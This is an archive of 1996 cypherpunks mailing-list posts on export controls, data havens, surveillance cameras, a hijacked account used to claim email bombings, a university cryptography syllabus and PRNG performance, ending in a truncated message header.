Date: Sat, 10 Aug 1996 17:11:42 +0800
To: cypherpunks@toad.com
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
In-Reply-To: <199608092330.QAA26402@mail.pacifier.com>
Message-ID: <v03007801ae31dbe7581f@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Voiceprints can be done on a modern PC with a D/A sound input. The
software is, essentially, FFT, various kinds of digital filtering
and windowing, and display. Linguists (my "real" profession) have
a generally low opinion of voiceprint analysis.

For an excellent introduction to the technology, read Alexander
Solzhenitsyn's "First Circle." (The linguistics is accurate.)

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 10 Aug 1996 15:27:54 +0800
To: cypherpunks@toad.com
Subject: DMV/Public record data on CDROM
Message-ID: <199608100338.XAA11082@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


There are several state's DMV data (or other public record data such as
Voter Registration) available on CD-ROM, with DOS search engines.

I have the demos for some of these programs on

    http://www.escape.com/~pstira/pi

Oregon is not the only place you can obtain this type of information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter.C.M.M.Terporten@Inter.NL.net (Peter C.M.M. Terporten)
Date: Sat, 10 Aug 1996 08:33:23 +0800
To: cypherpunks@toad.com
Subject: Re: Suit filed to enjoin crypto provisions of the ITAR
Message-ID: <199608092155.XAA28984@altrade.nijmegen.inter.nl.net>
MIME-Version: 1.0
Content-Type: text/plain


I am  just such a simpe foreigner trying to understand this.

I thought that the International Traffic in Arms Regulations (ITAR) had in
the meantime been replaced with the Defense Trade Regulations (TDR). If not,
is this still in the planning?

And is the latest ITAR text somewhere on the net?

TIA, Peter  
Advokatenkantoor Terporten   Computer law   
Peter C.M.M. Terporten       Media- and information law
Paulus Potterlaan 28         e-mail: terporte@inter.nl.net
NL-3723 EZ Bilthoven         tel 31-30-2251892
The Netherlands              fax 31-30-2251889
*** Waar Recht En Techniek Samenkomen ***





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Sat, 10 Aug 1996 15:34:06 +0800
To: jeremey@forequest.com
Subject: Re: Fw: SafE Mail Corporation
In-Reply-To: <Pine.BSI.3.93.960809172215.10361I-100000@descartes.forequest.com>
Message-ID: <199608100358.XAA08898@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 9 Aug 1996 17:24:01 -0700 (PDT)
   From: Jeremey Barrett <jeremey@forequest.com>
   MIME-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   > Date: Fri, 9 Aug 1996 14:42:56 -0400
   >  From: safemail@ntrnet.net (M.Wagoner (1))
   > To: law-office@felix.org
   > Cc: 
   > 
   > FINALLY, SOFTWARE THAT COMPLETELY ENSURES THE CONFIDENTIALITY OF 
   > PRIVILEGED ATTORNEY/CLIENT INFORMATION OVER THE INTERNET!
   > 

[snipped harder]

   [ blah blah blah blah blah.... ]

   Not this again...


Afraid so.  But they do challenge hackers to break it (the old `here's
some ciphertext, doesn't this look secure?' thing).  They also offer a
`free demo version', but due to federal law they can't make it
available over the net so they do this:

[from the order form on their web site:]
|                      copy    "EndUser"     2+    S/H       SubTotal
| DOS DEMO - version  ______ x   _FREE_   _FREE_   __$40_   =__________
                                                     ^^^

How nice of them to offer this free trial.  And if you crack the
sample message, you *get a free copy of the weak software*. Neat, huh?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 10 Aug 1996 15:43:44 +0800
To: serw30@laf.cioe.com (Eric Wilson)
Subject: Re: cybergangs?
In-Reply-To: <1.5.4.32.19960809230950.006ae3d0@gibson.cioe.com>
Message-ID: <199608100514.AAA32117@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Eric Wilson wrote:
> > How come this hasn't happened yet? Okay maybe not at such a grand scale,
> > but ya know? 
> A kind of Cybermilitia! Can we still wear green uniforms and camouflage face
> paint?

Go to news.* groups. You will see all kinds of people there.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@ACM.ORG>
Date: Sat, 10 Aug 1996 17:14:21 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: New web page for pgp.com
Message-ID: <199608100716.HAA01383@maalox>
MIME-Version: 1.0
Content-Type: text


I just wanted to let folks know that my new company has a new 
web page up at www.pgp.com.

Also, we are hiring a lot of people.  If you would like to work for
PGP Inc, contact us.  We need engineers, cryptographers, marketing
people, and people with many other skills.  If you are interested,
send email to our CEO, Tom Steding, at tsteding@pgp.com.  Or call us
at 415 631-1747.

--Philip Zimmermann
  prz@pgp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Aug 1996 03:25:15 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <199608101720.KAA04252@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 AM 8/10/96 -0400, Scottauge@aol.com wrote:
> I was watched CBS reports a couple nights ago about how all these blue collar
> and now white collar jobs are going across seas.
>
> How programmers in India are taking jobs away from us, programmers and
> engineerss, the people pioneering them.

Indian engineers typically get
one tenth or less of what European programmers get.

Many companies, for example Informix, have campuses here and
there across the USA, a campus in India, and several campuses
in Europe.  These campuses are linked by private televideo
connections, private voice mail systems, and the internet.

So theoretically a programmer in India should be much the same
to them as a programmer anywhere else.  Why should they care
where he lives.

Yet these companies continually spend vast sums of money on
politicians, lawyers, and perhaps bureaucrats, in
order to get their engineers out of India, so that they can pay
them more than ten times as much in some foreign country.

Informix has facilities in the US that are staffed mostly by 
Indians.  Why did it not leave these teams in India, where they 
would cost less than a tenth as much?

Clearly therefore, the same man is more than ten times as
valuable to them when he is not in India.

Since the communications are pretty much the same wherever he
is located, what makes the difference?

The power of the Indian government over that man and his work
makes the difference.

That man is poor because he is more subject to the power of the
state, which values him no more than any other expendable
slave, than he is contractually subject to those who value what
he can do.

Crypto relevance?

When the crypto economy gets going, and government interference
in the exchange of specialized labor becomes less effective, we 
can expect to see a radical rise in the standard of living.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Aug 1996 02:19:05 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <ae32022e03021004e1bc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 PM 8/10/96, Scottauge@aol.com wrote:
>I was watched CBS reports a couple nights ago about how all these blue collar
>and now white collar jobs are going across seas.
>
>How programmers in India are taking jobs away from us, programmers and
>engineerss, the people pioneering them.  (Actually I know some Indian based
>programmers and they are worked very hard, even being locked in a building
>until they meet some deadline.  This is not conducive to quality work, just
>enough to get ya back home to family.)

Where do I begin? First, what does "taking jobs away from us" mean? That we
own these jobs? And who is "us"?

And as for locking people in buildings until they meet a goal, I'd say
that's a pretty fair description of Silicon Valley start-ups. :-}


>White collar jobs are basically knowledge worker jobs, and if one does not
>know how to do something, one cannot do it.
>
>So a possible way to protect jobs is to protect the knowledge on how to do
>them.

This kind of protection did not work 150-200 years ago, when the
"Colonists" figured out to make fabric in mills and how to mechanize
factories--they ended up "stealing" the industry the Brits thought they had
sewn up. Life goes on.

Essentially all of the technologies we talk about on this list work toward
erasing national boundaries, much as Singapore and the U.S. might find this
distasteful.

>>From who could be an interesting question.  Obviously some companies would be
>interested in sharing the knowledge amongst the non-US tax paying population
>of the world, thereby reducing income and taxes collected and thus needing to
>raise taxes once again to pay for "rights" and entitlements the government
>"gives" away to the citizens and non-citizens of this country.... but, I am
>beginning to rant and rave.

Indeed you are. I would be interested in hearing a more coherent argument
for your case, though.

>Perhaps there is a larger picture in the world that the cyperpunks mailing
>list is missing.  That cryptography is not just for personal privacy, but
>could involve job security also - as a matter of fact, the income base for
>this whole country.

Given that our list is international, with active contributors from Sweden,
India, Germany, Cyberia, and even Singapore, I rather doubt many of them
see strong crytography, anonymous remailers, denationalized money, and
crypto anarchy as a means of propping up the government or the economy of
the United States of America.

>In essence, knowledge is money, cuz that is what we usually want for it
>now-a-days.  "Oh you want me to do that for you, hmmmm, lets see...."
>
>Maybe a discussion could happen on protection of knowledge in a
>socio-economic realm.

?????

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Sat, 10 Aug 1996 12:31:07 +0800
To: cypherpunks@toad.com
Subject: open diplomatic pouch
Message-ID: <199608100006.DAA27633@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


According to the Economist (20 July p. 28) the Danish ombudsman
has ruled that correspondence between the foreign ministry and
embassies must be available to the public.

-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
    "Over the mountains there are mountains."   -- Chang-rae Lee 
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Aug 1996 04:28:35 +0800
To: cypherpunks@toad.com
Subject: Data Havens in Anguilla About to End?
Message-ID: <ae321e2b0402100474e7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 PM 8/10/96, Anonymous wrote:
>As of immediately, the "taxBomber's Site & Internet Offshore Center"
>has been pulled by our Anguilla provider and will remain inaccessible
>for a few days.
>
>This is the work of some journalist hacks who did a major job of
>character assassination by claiming that we (and our provider)
>were involved in selling fake passports.

"Pulled by our Anguilla provider."

This says it all about the probable viability of nominally offshore providers.

(I assume this is Vince Cates' site, though I haven't doublechecked...he's
the only Anguilla provider of similar sites I know of. I certainly mean no
criticism of Vince, if it was indeed his site. My comments are analogous to
what we might say about a particular remailer site going down, even if we
don't criticize the site operator for removing his remailer.)


>But now, it seems, little Anguilla is getting "worried about its
>international reputation".
>
>Well, they are right, though with a vengeance: the reputation they
>have most certainly lost as of today is that being of one of the
>world's last truly liberal tax and data havens ...

I'm not an expert on offshort tax and data havens, but *any* country can be
pressured by larger countries, and even by the glare of publicity. If a
country derives very little revenue from "permitting" some service, and the
costs (they believe) are much greater than the revenues, they will likely
act. Thus, the negatives of allowing offshore data havens in Anguilla may
easily exceed the few thousand dollars (or whatever) they get in taxes and
fees (whatever they might be) from Vince and his customers.

Longterm, I've never believed there is much safety in locating in *any*
physical country. (By this I mean advertising and making it clear that one
is in Country X, said to be "friendly" to tax avoiders, data havens, money
laundering, etc. Policies can and do change overnight. Corrupt governments
are, well, corrupt, and will change tunes if another piper pays them
enough.)

The case in Switzerland, with banking, is quite a bit different, with huge
deposits and huge fees from their financial services. Even so, Switzerland
has continually yielded more ground to tax collectors and various pressure
groups from large nations.

I'd guess that Vince has had a fun time in the Carribbean, but that he'll
be closing up shop sometime soon. Once some services are yanked, confidence
is lost.

The interesting question will be whether the U.S. authorities and
especially the Internal Revenue Service will put pressure on him if he
chooses to return to the U.S.

(Assuming this was Vince's service that is. But even if it wasn't, pressure
on another service means pressure on all Aguillan services.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sat, 10 Aug 1996 22:18:19 +0800
To: cypherpunks@toad.com
Subject: Email Bombing
Message-ID: <Pine.BSI.3.91.960810044131.29282A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



Two messages were sent from my account to dc-stuff having me taking 
credit for email bombs against certain people, namely: Jeff Slaton, 
Captain Crunch and the Cyberangels.

I first became aware of these emails after receiving a message from 
Emmanuel Goldstein asking about who was doing this, as his email box was 
being slaughtered at that very moment.

I *DID NOT* email bomb anyone. This is going to be hard to believe since 
those mentioned as targets of annihilation were people I have fucked with 
in the past very openly on dc-stuff. This combined with the current 
"blame everything on se7en" attitude makes it very hard for anyone to 
take this professed innocence seriously.

I called my SysAdmin this morning at 4:00 AM PST and he ran through the 
logs of my account. The emails did in fact come from my account, but, the 
logs show unusual activity which can't be accounted for by either side. 
Fortunately, the logs show that the actual bombing was not done from my 
account.

I was on IRC for several hours talking to trusted friends while this all 
happened. Whoever penetrated my account knew what the hell they were 
doing in respects to log modification. A re-install is in process as well 
as a tightening of overall site security, especially my account.

I am not really upset other than my email account was used to take credit 
for something I didn't do. My account could have been used for more 
nefarious purposes; it wasn't. Veterans of dc-stuff know I am not afraid 
to take credit for the things I do. I did not do this. But I will also 
not lose any sleep over the Spam King being hit. Captain Crunch: well, 
after all is said and done, he is harmless. Same with the CyberAngels: 
they can talk the talk, but can't walk the walk. I have proved that many 
times. In the end, they are harmless also. Hitting them wouldn't 
accomplish anything tangible.

At this time, the initial mail headers show the attack was launched via 
sun.dmci.com from either a netcom.com or an io.* domain. No doubt the 
account used to launch the attack was hacked. The identity of the bomber 
may never be known. All I know is that it wasn't me. Take it for what's 
it worth. Time will vindicate me, as time always does. I just hope it's 
sooner than later. Hold your judgement of me until such time.

And while dis.org has been recently compromised, I wouldn't be so quick 
to blame this on the same people. I have had intermediary contact with 
Galf sufficient for me to believe he made his point and has moved on, 
having not been responsible for this latest wave of email impersonation. 
Recent logs have shown that a kind of "open season" has been declared 
upon dis.org by every newbie out there that has heard of recent events. I 
say newbie because none of the recent attempts to gain access have proved 
successful.

I used to laugh about email bombing. But when it happens and you are 
caught up in it, it is not funny. If any of you out there think it is, 
wait until you find tens of thousands of messages in your inbox and an 
incoming rate of 750 per minute, every minute. Scripts will not save you.

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 10 Aug 1996 22:15:06 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate	  photo'ed.
Message-ID: <v02120d06ae322b2d8736@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 8/9/96, Bill Stewart wrote:
>At 10:45 PM 8/8/96 -0700, Lucky wrote:
>>At 21:55 8/8/96, i am not a number! wrote:
>>>CBS radio news this morning: 80,000 commuters traveling the central
>>>f'way in SF will have information mailed to them regarding the quake retrofit
>>>How?  Their license plates have been photographed.
>
>>You *are* making this up, right? Please say you did.
>
>It's possible today, and probably affordable.  If not, it will be in 1-2 years,

I know that there are video cameras on the freeway. I also know that
reading license plate must be trivial, since I saw such systems abroad
years ago. In fact, in Europe, where cameras are ubiquitous in inner
cities, face recognition is the latest fad.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 10 Aug 1996 22:04:56 +0800
To: Bryan Reece <jeremey@forequest.com
Subject: Re: Fw: SafE Mail Corporation
Message-ID: <v02120d07ae322ddf2940@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:58 8/9/96, Bryan Reece wrote:

>Afraid so.  But they do challenge hackers to break it (the old `here's
>some ciphertext, doesn't this look secure?' thing).  They also offer a
>`free demo version', but due to federal law they can't make it
>available over the net so they do this:

We showed their software to be worthless a few months ago. I am surprised
they are still selling it. They are opening themselves up for some very
nasty litigation.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Ray" <liberty@gate.net>
Date: Sat, 10 Aug 1996 20:48:43 +0800
To: cypherpunks@toad.com
Subject: Nyms I'd vote for
Message-ID: <199608100948.FAA123578@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rich Graves <rich@c2.org> wrote:

>On Fri, 9 Aug 1996, John F. Fricker wrote:
>
>> #3) The goal is the anonymous citizen. The first step it to secure
>> #the data
>> currently exposed. Can this be done _without_ legislation?
>
>I disagree with this goal. The anonymous consumer/worker, yes; the
>public has no business knowing what I as an economic actor buy, read,
>and think. If I choose to participate fully in the political system,
>though, in ways that go beyond votes and petty contributions to
>others' campaigns, the public has an interest in my identity and
>biases. Anonymous voices can and should be heard, and they can and
>should be influential at times, but they don't get to run for office.

[Rant -- you touched a sore spot here, Rich.]
And I disagree with Rich, at least in regard to the present system. 

My "representative," is Ileanna Ros Lehtinen (R.). No Democrats have
chosen to run against her, and the Demopublican's beloved ballot laws
prevent me from running and actually getting on the ballot. I would
GLADLY vote for either Lucky Green or Black Unicorn if these nyms were
running against this statist woman, but I am not given that (or any
other) choice by the state. She has already "won" the "election," and
thus will NOT APPEAR on the ballot. The state of Florida assumes that
I would rather not vote for None Of The Above [NOTA], and my state is,
once again, wrong. The Florida Supreme Court is carefully ignoring the
Constitution(s) they all swore to uphold in these cases, and I am
trying to use any medium I can to trumpet this fact, so that solutions
like Mr. Bell's (yes, Jim, I know you have one for this, too) don't
start sounding better and better.  <sigh> :(
[End Rant]

P.S. Lucky & Uni: don't worry, I plan to [try to] write in "Jim Ray." 
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"Ray's corrolary to Murphy's Law: 'You will be spared NOTHING.'" -- 
P. C. Ray (my dad)

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgxaBW1lp8bpvW01AQGRIQP+OZebKXfGgsKTdzIzld1vomnVqnB4nQ3L
C0iDcTPqsEuEN/39nb+BinccCvjM3vvdxTVOYhs9QS1Gdf4TwkUE8+k3oWc1X7hy
AtLcemGGQ+pwyMwfqd6gAboLM9oeg/QeRtaa+MXSdrl8WU/KCTWxeIQTH1/LPKLq
9KiTlgHH+2U=
=tBZy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 10 Aug 1996 19:52:42 +0800
To: cypherpunks@toad.com
Subject: Re: Drive the SF Central
Message-ID: <TCPSMTP.16.8.10.5.51.48.2645935021.660960@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 >>CBS radio news this morning: 80,000 commuters traveling the central
 >>f'way in SF will have information mailed to them regarding the quake retrofit
 >>How?  Their license plates have been photographed.
 
 >You *are* making this up, right? Please say you did.

 In> It's possible today, and probably affordable.  If not, it will be in
 In> 1-2 years, as Moore's law cranks down processing costs and video
 In> technology improves. For this application, they don't have to
 In> photograph every car, or read every plate successfully, or do it in
 In> real time.  The objective is to get lots of drivers to take other
 In> routes or mass transit so they don't have to dump all the traffic onto
 In> surface streets right around the construction. 

 Wasn't there something about these cameras in the latest 2600?
 (BTW, there was also alot of information on encryption in the
 issue, too.)


 P.J.
 pjn@nworks.com


... TagX Pro of Borg - "Your tagline will be assimilated."

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 10 Aug 1996 23:23:33 +0800
To: cypherpunks@toad.com
Subject: cryptography course at WPI
Message-ID: <v03007802ae322a849e00@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 9 Aug 1996 19:19:10 -0400 (EDT)
From: Christof Paar <christof@ece.wpi.edu>
To: dcsb@ai.mit.edu
Subject: cryptography course at WPI
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Christof Paar <christof@ece.wpi.edu>
Status: U

(I hope this mail is appropriate for this mailing list :)

This announcment is probably mainly of interest to people in the greater
Boston area.  I will offer a graduate course in crypto and data security in
the fall at Worcester Polytechnic Institute.  The focus group are on-campus
students as well as people in industry.  Last year, I taught exactly the same
course in industry and it was a big success.  I am sure that it serves
industry needs very well.

I will be gone for one week but promise to answer all questions about the
course immediately when I return.

Regards,

Christof Paar



PS: There will be an advanced crypto course in the spring.


________________________________________________
Christof Paar
Assistant Professor
ECE Department
Worcester Polytechnic Institute
100 Institute Road
Worcester, MA 01609
email: christof@ece.wpi.edu
www:   http://ee.wpi.edu/People/faculty/cxp.html
tel:   (508) 831 5061
fax:   (508) 831 5491



============================================================================

                               WPI

           EE 578/CS 578: CRYPTOGRAPHY AND DATA SECURITY

                     Fall '96, Monday, 5:30-8:15 pm


                           INTRODUCTION

It is well known that we are in the midst of a shift towards an information
society. The upcoming generation of digital information systems will provide
services such as:

  -  wireless LAN and WAN computer networks

  -  multi-media services (e.g., high quality video-on-demand)

  -  smart cards (e.g., for network identification of electronic purse)

  -  electronic banking/digital commerce

These and other new information-based applications will have far reaching
consequences. As this happens, security aspects of communication systems are
of growing commercial and public interest. Unfortunately, these aspects have
been widely underestimated or ignored in the past. Today, however, there is
high demand for expertise and high quality products in the field of
information security and cryptography.

WPI's graduate course EE 578/CS 578 provides a solid and broad foundation in
the area of cryptography and data security. After taking the course students
should have an overview of state-of-the-art cryptography. In industry, they
should be able to carefully choose and design a security scheme for a given
application. The course also serves as an introduction for students who are
interested in pursuing research in cryptography. There are several
opportunities for Master's and PhD theses in the field of cryptography.



                     COURSE DESCRIPTION

This course gives a comprehensive introduction into the field of
cryptography and data security. We begin with the introduction of the
concepts of data security. Different attacks on cryptographic systems are
classified. Some pseudo-random generators are introduced. The concepts of
public and private key cryptography is developed. As important
representatives for secret key schemes, DES, IDEA, and other private key
algorithms are described. The public key schemes RSA, ElGamal, and elliptic
curve crypto systems are developed. As important tools for authentication
and integrity, digital signatures and hash functions are introduced.
Advanced protocols for key distribution in networks are developed.
Identification schemes are treated as advanced topics.  Some mathematical
algorithms for attacking cryptographic schemes are discussed. Application
examples will include a protocol for security in a LAN and identification
with smart cards. Special consideration will be given to schemes which are
relevant for network environments.  For all schemes, implementation aspects
and up-to-date security estimations will be discussed.



                        PREREQUISITES

Working knowledge of ``C''. An interest in discrete mathematics and
algorithms is highly desirable.


                           TEXTBOOK

D.R. Stinson, Cryptography: Theory and Practice. CRC Press, 1995



                     SYLLABUS EE 578/CS 578

An important part of the course is an independent project. The project topic
can freely be chosen by the student. Possible topics include (but are not
limited to) implementation of a real-size cryptographic algorithm or
protocol, a literature study on new cryptographic schemes or on legal
aspects of cryptography, or implementation of an algorithm for attacking a
cryptographic scheme.


WEEK 1:
Introduction: Principals of cryptography. Classical algorithms.
Attacks on cryptographic systems.

WEEK 2:
Stream ciphers and pseudo-random generators. Some information theoretical
results on cryptography.

WEEK 3:
Private key cryptography: The Data Encryption Standard DES. Brief history,
function and performance.

WEEK 4:
Private key cryptography: Recent results on successful attacks on DES.
Operation modes of symmetric ciphers. IDEA and other alternatives to DES.

WEEK 5:
Public key cryptography: Introduction. Some Number Theory and Algebra.

WEEK 6:
Public key cryptography: RSA. Function and security. Recent results on
successful attacks on RSA.

WEEK 7:
Midterm exam.

WEEK 8:
Public key cryptography: The discrete logarithm problem. ElGamal crypto
system. Function and security. Security estimations.

WEEK 9:
Public key cryptography: Elliptic curve systems. Mathematical background,
function and security.

WEEK 10:
Digital Signatures: The ElGamal signature scheme. Message Authentication
Codes (MAC).

WEEK 11:
Hash functions: Principals. Block cipher based hash functions.
Protocols: Attacks against protocols, protocols for privacy,
authentication, and integrity.

WEEK 12:
Key distribution in networks: Private key approaches, certificates, and
authenticated key agreement.

WEEK 13:
Identification schemes: Challenge-and-response protocols. The Schnorr
identification scheme for smart cards.

WEEK 14:
Final exam.



******************************************************************************
Christof Paar                        http://ee.wpi.edu/People/faculty/cxp.html
Assistant Professor                  email:  christof@ece.wpi.edu
ECE Department                       phone:  (508) 831 5061
Worcester Polytechnic Institute      fax:    (508) 831 5491
100 Institute Road
Worcester, MA 01609, USA
******************************************************************************




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sat, 10 Aug 1996 23:42:59 +0800
To: cypherpunks@toad.com
Subject: National Socio-Economic Security Need for Encryption Technology
Message-ID: <960810081520_381433332@emout13.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I was watched CBS reports a couple nights ago about how all these blue collar
and now white collar jobs are going across seas.

How programmers in India are taking jobs away from us, programmers and
engineerss, the people pioneering them.  (Actually I know some Indian based
programmers and they are worked very hard, even being locked in a building
until they meet some deadline.  This is not conducive to quality work, just
enough to get ya back home to family.)

(Hmmm, the Pioneer Crypto-System, I think I like that name and it has a
specific purpose....)

So I was thinking, boy am I glad I am in a rather esoteric part of software
development where there is not much knowledge and how we, in this particular
field, have an unwritten rule about sharing knowledge with others - even
those trying to get a foot into the door.  (I'm a contractor and there is a
supply and demand thing going on - I like low supply and high demand for my
particular skill sets.)

White collar jobs are basically knowledge worker jobs, and if one does not
know how to do something, one cannot do it.

So a possible way to protect jobs is to protect the knowledge on how to do
them.  

>From who could be an interesting question.  Obviously some companies would be
interested in sharing the knowledge amongst the non-US tax paying population
of the world, thereby reducing income and taxes collected and thus needing to
raise taxes once again to pay for "rights" and entitlements the government
"gives" away to the citizens and non-citizens of this country.... but, I am
beginning to rant and rave.

Perhaps there is a larger picture in the world that the cyperpunks mailing
list is missing.  That cryptography is not just for personal privacy, but
could involve job security also - as a matter of fact, the income base for
this whole country.

In essence, knowledge is money, cuz that is what we usually want for it
now-a-days.  "Oh you want me to do that for you, hmmmm, lets see...."

Maybe a discussion could happen on protection of knowledge in a
socio-economic realm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 11 Aug 1996 02:59:46 +0800
To: cypherpunks@toad.com
Subject: Chemistry question please ..
Message-ID: <199608101553.IAA10751@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there such a chemical compound as putracine ( maybe not correctly spelled ) which emulates the extreme odor of rotting corpses ? If so where can I find out how to make it ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Sun, 11 Aug 1996 02:19:05 +0800
To: cypherpunks@toad.com
Subject: The BBS PRNG
Message-ID: <199608101630.JAA00353@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Is the BBS PRNG covered by any patents anywhere? How about the
probabilistic encryption public-key cryptosystem?

If anyone has a BBS PRNG working on a 486 could they please send me
a the clock frequency and bytes/sec they can generate for some
common moduli: 512, 1024, and 2048, say. I am close to having
an implementation which will run at 500 bytes/sec on a 486 DX/2
with a 1024 bit modulus and am not sure if that is competitively
fast or not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi (** CRAM **)
Date: Sat, 10 Aug 1996 20:26:12 +0800
To: cypherpunks@toad.com
Subject: Re: editorial: information havenots already have not
Message-ID: <9608101016.AA24621@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 11 Aug 1996 03:25:14 +0800
To: cypherpunks@toad.com
Subject: Re: Chemistry question please ..
